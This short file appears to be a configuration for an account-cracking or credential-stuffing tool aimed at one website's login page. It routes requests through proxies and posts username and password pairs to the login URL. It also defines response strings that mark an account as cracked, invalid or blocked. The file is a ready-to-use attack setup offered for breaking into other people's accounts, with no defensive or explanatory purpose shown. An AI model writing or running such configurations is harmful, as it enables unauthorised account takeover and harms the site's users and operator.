[Details]
Title=throated
Author=percebal
Version=1
ConnectionCount=1
UseProxies=1
BannedString=We are experiencing some problems!|Empty captcha value
CrackedString=Location: http://members.throated.com/en|>Log out<
InvalidString=Wrong username or password provided.|Your account is expired|Your account is deactivated for abuse.
[Connection_1]
Host=www.throated.com
URL=/en/login
PostData=username=[user]&password=[pass]&mDate=&mTime=&submit=Click+here+to+login&mOffset=&back=
IsLogin=1
Method=1
ParseCount=0
